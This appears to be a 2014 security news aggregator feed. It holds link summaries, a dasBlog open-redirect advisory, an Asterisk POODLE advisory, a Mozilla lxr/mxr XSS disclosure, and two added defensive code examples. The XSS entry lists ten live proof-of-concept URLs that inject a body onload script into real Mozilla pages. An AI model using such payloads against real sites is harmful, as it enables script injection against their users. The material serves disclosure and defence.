October 18, 2014, 2:11 am
OnionPhone (OPH) is a VOIP tool for calling over the Tor network which can be used as a VOIP plugin for TorChat. A call is targeted to the onion address of the recipient (its hidden service, HS).
OPH provides an independent level of p2p encryption and authentication which employs modern cryptographic primitives: Diffie-Hellman key exchange on Elliptic Curve 25519 and Keccak Sponge Duplexing encryption. In the case of a call to the onion address, Tor protects against MitM attacks. Also the recipient can verify the identity of the originator's onion address (only with the permission of the sender), similarly to the TorChat authentication.
more here.............https://github.com/gegel/onionphone/
↧
October 18, 2014, 2:52 am
This script modifies the current user's Spotlight preferences, disabling sharing of Spotlight searches with Apple. Spotlight appears to send live keystrokes directly to Apple, notes Landon Fuller of Plausible Labs Cooperative, Inc.
more here............https://fix-macosx.com/
↧
October 19, 2014, 3:47 am
ADVobfuscator demonstrates how to use the C++11 language to generate, at compile time, obfuscated code without using any external tool and without modifying the compiler. The techniques presented rely only on C++11, as standardized by ISO. It also shows how to introduce some form of randomness to generate polymorphic code, and it gives some concrete examples like the encryption of string literals and the obfuscation of calls using finite state machines.
more here...........https://github.com/andrivet/ADVobfuscator
↧
October 19, 2014, 4:42 am
Most targeted attacks against organizations originate as spear-phish campaigns or watering hole style web driveby attacks. Within the last six months, Invincea has discovered and stopped targeted malvertising attacks against specific companies -- particularly those in the Defense Industrial Base. The combination of traditional cyber crime methods (malvertising) with targeted attacks against Defense industrials for theft of IP represents another development in the on-going blending of techniques from cyber crime and advanced threat actors with nation state agendas. We are tracking an on-going campaign against US Defense companies under the code name Operation DeathClick.
more here............http://www.invincea.com/wp-content/uploads/2014/10/Micro-Targeted-Malvertising-WP-FINAL-10-18-14.pdf
↧
October 19, 2014, 8:33 am
Over the years, many managed security service providers have been publishing variants of an external Threat Analysis in one form or another. Annual, Quarterly, Weekly, Daily, and live feeds are regular deliverables now from anyone who is anyone in the Security Industry.
Great news, right? Well... sort of...
The fact is, that each of these service providers had their own proprietary naming conventions and threat report formats. This made it difficult for the consumer of these reports and feeds to understand what information was redundant, and what was really important.
more here..........http://security-musings.blogspot.ca/2014/10/know-your-threat-landscape-standardized.html
↧
October 20, 2014, 3:07 am
A proof of concept (for Flash 14.0.0.145) of a heap-based buffer overflow patched on September 9th, affecting Flash 13.0.0.<244, 14.0.0.<=179, 15.0.0.<152, was published on September 30th on Packet Storm. Code targeting that CVE is now in Nuclear Pack.
more here..........http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html
↧
October 20, 2014, 3:08 am
Exploit Title: Newtelligence dasBlog Open Redirect Vulnerability
Product: dasBlog
Vendor: Newtelligence
Vulnerable Versions: 2.3 (2.3.9074.18820), 2.2 (2.2.8279.16125), 2.1 (2.1.8102.813)
Tested Version: 2.3 (2.3.9074.18820)
Advisory Publication: OCT 15, 2014
Latest Update: OCT 15, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-7292
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]

Advisory Details:
Newtelligence dasBlog ct.ashx is vulnerable to Open Redirect attacks.
dasBlog supports a feature called Click-Through which basically tracks all links clicked inside your blog posts. It's a nice feature that allows the blogger to stay informed what kind of content readers like. If Click-Through is turned on, all URLs inside blog entries will be replaced with <URL to your blog>/ct.ashx?id=<Blog entry ID>&url=<URL-encoded original URL> which of course breaks WebSnapr previews.
Web.config code:
<add verb="*" path="ct.ashx" type="newtelligence.DasBlog.Web.Services.ClickThroughHandler, newtelligence.DasBlog.Web.Services"/>
(1) The vulnerability occurs at the "ct.ashx?" page, with the "&url" parameter.

Solutions:
2014-10-15 Public disclosure with self-written patch.

References:
http://www.tetraph.com/blog/cves/cve-2014-7292-newtelligence-dasblog-open-redirect-vulnerability/
https://searchcode.com/codesearch/view/8710666/
https://www.microsoft.com/web/gallery/dasblog.aspx
https://dasblog.codeplex.com/releases/view/86033
http://cwe.mitre.org
http://cve.mitre.org/
↧
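One way to close the open redirect in a click-through handler like ct.ashx while keeping the tracking feature working, as an added example (not dasBlog's code or the advisory's patch): the blog signs every rewritten link with an HMAC over the entry id and target URL, and the handler redirects only when that signature verifies. SECRET_KEY, the sig parameter and the function names are assumptions.

```python
import hmac
import hashlib
from urllib.parse import urlencode, parse_qs, urlsplit

# Constructed demo key; a real deployment generates one per installation.
SECRET_KEY = b"constructed-demo-key-not-for-production"


def _mac(entry_id: str, url: str) -> str:
    # Bind entry id and the exact URL together so neither can be swapped.
    msg = f"{entry_id}\x00{url}".encode("utf-8")
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def rewrite_link(blog_base: str, entry_id: str, url: str) -> str:
    """Produce the tracked link the blog embeds in a post, now carrying a signature.
    Mirrors the advisory's <blog>/ct.ashx?id=<entry>&url=<encoded url> shape."""
    query = urlencode({"id": entry_id, "url": url, "sig": _mac(entry_id, url)})
    return f"{blog_base}/ct.ashx?{query}"


def click_through(request_query: str):
    """Handler logic for ct.ashx: return the Location to redirect to, or None to refuse."""
    params = parse_qs(request_query, keep_blank_values=True)
    try:
        entry_id = params["id"][0]
        url = params["url"][0]
        sig = params["sig"][0]
    except (KeyError, IndexError):
        return None  # a hand-crafted ct.ashx?url=... with no signature is refused
    if not hmac.compare_digest(sig, _mac(entry_id, url)):
        return None  # url is not one the blog itself emitted for this entry
    if urlsplit(url).scheme not in ("http", "https"):
        return None  # belt and braces: never redirect to javascript:/data:/etc.
    return url


if __name__ == "__main__":
    link = rewrite_link("https://blog.example", "42", "https://mozilla.org/")
    print(link)
    print(click_through(link.split("?", 1)[1]))
```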
October 20, 2014, 3:09 am
Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)

Websites information:
lxr.mozilla.org, mxr.mozilla.org are cross references designed to display the Mozilla source code. The sources displayed are those that are currently checked in to the mainline of the mozilla.org CVS server, Mercurial Server, and Subversion Server; these pages are updated many times a day, so they should be pretty close to the latest-and-greatest. (from Mozilla)

Vulnerability description:
All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source
This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users. Since there are a large number of pages under them, and the contents of the two domains vary, this makes the vulnerability very dangerous. Attackers can use different URLs to design XSS attacks to Mozilla's variety class of users.
The vulnerability has been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.

POCs:
http://lxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>
http://lxr.mozilla.org/mozilla-central/source/mobile/android/<body onload=prompt("justqdjing")>
http://lxr.mozilla.org/mozilla-central/source/Android.mk/<body onload=prompt("tetraph")>
http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/<body onload=prompt("tetraph")>
http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp<body onload=prompt("tetraph")>
http://mxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>
http://mxr.mozilla.org/mozilla-central/source/webapprt/<body onload=prompt("justqdjing")>
http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/<body onload=prompt("justqdjing")>
http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/<body onload=prompt("tetraph")>
http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/<body onload=prompt("tetraph")>

POC Video:
https://www.youtube.com/user/tetraph

Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest>
We can see that the reflected page contains the following code.
<a href="/mozilla-central/source/chrome/%253Cattacktest%253E"><attacktest></attacktest></a>
If we insert "<body onload=prompt("justqdjing")>" into the URL, the code can be executed.
The vulnerability can be attacked without user login. My tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. (From Wikipedia)

Posted By:
Wang Jing, mathematics student from Nanyang Technological University, Singapore.
http://tetraph.com/wangjing/

More Details:
http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source
↧
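The analysis above shows the usual root cause of a path-reflected XSS: the href is percent-encoded for the URL context, but the same path segment is copied into the link text with no HTML encoding. Both renderers below are constructed for this added example (they are not lxr/mxr code); SOURCE_ROOT and the function names are assumptions.

```python
import html
from urllib.parse import quote

SOURCE_ROOT = "/mozilla-central/source"  # path prefix quoted in the advisory


def breadcrumb_unsafe(path: str) -> str:
    """Reproduces the reflected pattern: href percent-encoded, text copied raw."""
    out, acc = [], SOURCE_ROOT
    for seg in [s for s in path.split("/") if s]:
        acc += "/" + quote(seg, safe="")           # correct encoding for a URL...
        out.append(f'<a href="{acc}">{seg}</a>')   # ...but none for HTML text
    return "/".join(out)


def breadcrumb_safe(path: str) -> str:
    """Same markup, with each value encoded for the context it lands in:
    percent-encoding for the path, HTML entities for attribute and text."""
    out, acc = [], SOURCE_ROOT
    for seg in [s for s in path.split("/") if s]:
        acc += "/" + quote(seg, safe="")
        href = html.escape(acc, quote=True)   # neutralise " and & in the attribute
        text = html.escape(seg, quote=True)   # < > & " become entities in the text
        out.append(f'<a href="{href}">{text}</a>')
    return "/".join(out)


def segment_survives_as_markup(rendered: str, segment: str) -> bool:
    """Detection-style check: does the raw segment appear verbatim in the output?"""
    return segment in rendered


if __name__ == "__main__":
    probe = "chrome/<attacktest>"   # the harmless marker the advisory uses
    print(breadcrumb_unsafe(probe))
    print(breadcrumb_safe(probe))
```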
October 20, 2014, 3:12 am
A few days ago, I gave a presentation at Ruxcon about breaking international voicemail security. Whilst the crowd and conference were absolutely amazing - my overall research, I think has a much wider scope in the terms of whom it could affect. This blog post acts as a technical writeup and companion to my slides presented at Ruxcon.
TL;DR Briefly put, through researching the visual voicemail protocol, we were able to document a number of different vulnerabilities, including some which affected the third largest telco in Australia (30% market share); however, the findings could affect a large number of other telcos internationally.
more here..........https://shubh.am/breaking-international-voicemail-security-via-vvm-exploitation/
↧
October 20, 2014, 3:16 am
This is a criticism about Ashar Javed's BlackHat EU Talk: Revisiting XSS Sanitization.
I believe, as in any field of science, we need to have a discussion about published research. Especially when we think there is something wrong with the "experiments" and the resulting conclusion. Maybe I'm completely overlooking something, but at this point I don't even understand how this talk got accepted to a renowned conference like Black Hat.
First I want to give a quick summary of what Ashar Javed claims. Then I want to talk about what I thought is the consensus of the security community regarding XSS. And at the end I want to evaluate his conclusion/solution. Unfortunately I haven't seen his talk, so I can only read his paper and guess what he said during those 168 slides.
more here.........https://www.smrrd.de/criticism-revisiting-xss-sanitization.html
↧
October 20, 2014, 4:07 am
Molly also has an OTA available to LPX13D. It only took me a couple of hours to get my ADT-1 to actually accept it. As with the new Nexus 5 and 7 previews, this device needs a modified kernel for root.
It's all a bit clumsy and will be easier in the future, but here's how you get root on it:
more here...........https://plus.google.com/+Chainfire/posts/a5YshULM8hf
↧
October 20, 2014, 4:07 am
Tcpdump is just one of the tools that will make troubleshooting network issues, testing applications, or even finding out what traffic is being generated on a host easier. This podcast is to help you understand the Tcpdump program, and how powerful it is.
more here............http://brakeingsecurity.com/keep-calm-and-take-a-tcpdump
↧
October 20, 2014, 4:13 am
Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited.
This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target SCADA systems.
more here..........http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/
↧
October 20, 2014, 9:49 am
Asterisk Project Security Advisory - AST-2014-011

Product: Asterisk
Summary: Asterisk Susceptibility to POODLE Vulnerability
Nature of Advisory: Unauthorized Data Disclosure
Susceptibility: Remote Unauthenticated Sessions
Severity: Medium
Exploits Known: No
Reported On: 16 October 2014
Reported By: abelbeck
Posted On: 20 October 2014
Last Updated On: October 20, 2014
Advisory Contact: Matt Jordan <mjordan AT digium DOT com>
CVE Name: CVE-2014-3566

Description:
The POODLE vulnerability - described under CVE-2014-3566 - is described at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566. This advisory describes the Asterisk project's susceptibility to this vulnerability.
The POODLE vulnerability consists of two issues:
1) A vulnerability in the SSL protocol version 3.0. This vulnerability has no known solution.
2) The ability to force a fallback to SSLv3 when a TLS connection is negotiated.
Asterisk is susceptible to both portions of the vulnerability in different places.
1) The res_jabber and res_xmpp modules both use SSLv3 exclusively, and are hence susceptible to POODLE.
2) The core TLS handling, used by the chan_sip channel driver, Asterisk Manager Interface (AMI), and the Asterisk HTTP server, defaults to allowing SSLv3/SSLv2 fallback. This allows a MITM to potentially force a connection to fall back to SSLv3, exposing it to the POODLE vulnerability.

Resolution:
Asterisk has been patched such that it no longer uses SSLv3 for the res_jabber/res_xmpp modules. Additionally, when the encryption method is not specified, the default handling in the TLS core no longer allows for a fallback to SSLv3 or SSLv2.
1) Users of Asterisk's res_jabber or res_xmpp modules should upgrade to the versions of Asterisk specified in this advisory.
2) Users of Asterisk's chan_sip channel driver, AMI, and HTTP server may set the "tlsclientmethod" or "sslclientmethod" to "tlsv1" to force TLSv1 as the only allowed encryption method. Alternatively, they may also upgrade to the versions of Asterisk specified in this advisory.
Users of Asterisk are encouraged to NOT specify "sslv2" or "sslv3". Doing so will now emit a WARNING.

Affected Versions (Product / Release Series):
Asterisk Open Source 1.8.x: All versions
Asterisk Open Source 11.x: All versions
Asterisk Open Source 12.x: All versions
Certified Asterisk 1.8.28: All versions
Certified Asterisk 11.6: All versions

Corrected In (Product / Release):
Asterisk Open Source: 1.8.31.1, 11.13.1, 12.6.1
Certified Asterisk: 1.8.28-cert2, 11.6-cert7

Patches (SVN URL / Revision):
http://downloads.asterisk.org/pub/security/AST-2014-011-1.8.diff - Asterisk 1.8
http://downloads.asterisk.org/pub/security/AST-2014-011-11.diff - Asterisk 11
http://downloads.asterisk.org/pub/security/AST-2014-011-12.diff - Asterisk 12
http://downloads.asterisk.org/pub/security/AST-2014-011-1.8.28.diff - Certified Asterisk 1.8.28
http://downloads.asterisk.org/pub/security/AST-2014-011-11.6.diff - Certified Asterisk 11.6

Links:
https://issues.asterisk.org/jira/browse/ASTERISK-24425

Asterisk Project Security Advisories are posted at http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2014-011.pdf and http://downloads.digium.com/pub/security/AST-2014-011.html

Revision History (Date / Editor / Revisions Made):
October 19 - Matt Jordan - Initial Revision

Asterisk Project Security Advisory - AST-2014-011
Copyright (c) 2014 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.
↧
October 20, 2014, 1:08 pm
Users in China are reporting MITM attacks on SSL connections to iCloud.
GreatFire.org, who monitor the Great Firewall of China (GFW), also published a blog post on their website earlier today saying:
This is clearly a malicious attack on Apple in an effort to gain access to usernames and passwords and consequently all data stored on iCloud such as iMessages, photos, contacts, etc.
more here..........http://www.netresec.com/?page=Blog&month=2014-10&post=Chinese-MITM-Attack-on-iCloud
↧
October 20, 2014, 1:13 pm
Sometimes when I'm doing security research I'll come across a bug which surprises me. I discovered just such a bug in the Windows version of Chrome which exposed a little-known security detail in the OS. The bug, CVE-2014-3196 was fixed in M38, so it seemed a good time for a blog post. The actual reported issue is here. While the bug didn’t allow for a full sandbox escape it did provide the initial part of a chain; something that’s still important to fix.
more here..........http://googleprojectzero.blogspot.com/2014/10/did-man-with-no-name-feel-insecure.html
↧
October 20, 2014, 1:14 pm
While revelations from Edward Snowden about the National Security Agency’s massive database of phone records have sparked a national debate about its constitutionality, another secretive database has gone largely unnoticed and without scrutiny.
The database, which affects unknown numbers of people, contains phone records that at least five police agencies in southeast Virginia have been collecting since 2012 and sharing with one another with little oversight.
more here...........http://www.wired.com/2014/10/virginia-police-secretively-stockpiling-private-phone-records/
↧
October 20, 2014, 1:17 pm
Almost from the beginning when I released PDFiD, people asked me for an anti-virus-like feature: that PDFiD would tell you if a PDF was malicious or not. Some people even patched PDFiD with a scoring feature.
But I didn’t want to develop an “anti-virus” for PDFs; PDFiD is a triage tool.
Now you can develop your own scoring system with plugins.
more here........http://blog.didierstevens.com/2014/10/20/update-pdfid-with-plugins-part-1/
↧
October 20, 2014, 11:48 pm
Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.
more here.........http://krebsonsecurity.com/2014/10/banks-credit-card-breach-at-staples-stores/
↧
October 20, 2014, 11:50 pm
Apple designed the iOS platform with security at its core. When we set out to create the best possible mobile platform, we drew from decades of experience to build an entirely new architecture. We thought about the security hazards of the desktop environment, and established a new approach to security in the design of iOS. We developed and incorporated innovative features that tighten mobile security and protect the entire system by default. As a result, iOS is a major leap forward in security for mobile devices.
more here...........https://www.apple.com/privacy/docs/iOS_Security_Guide_Oct_2014.pdf
↧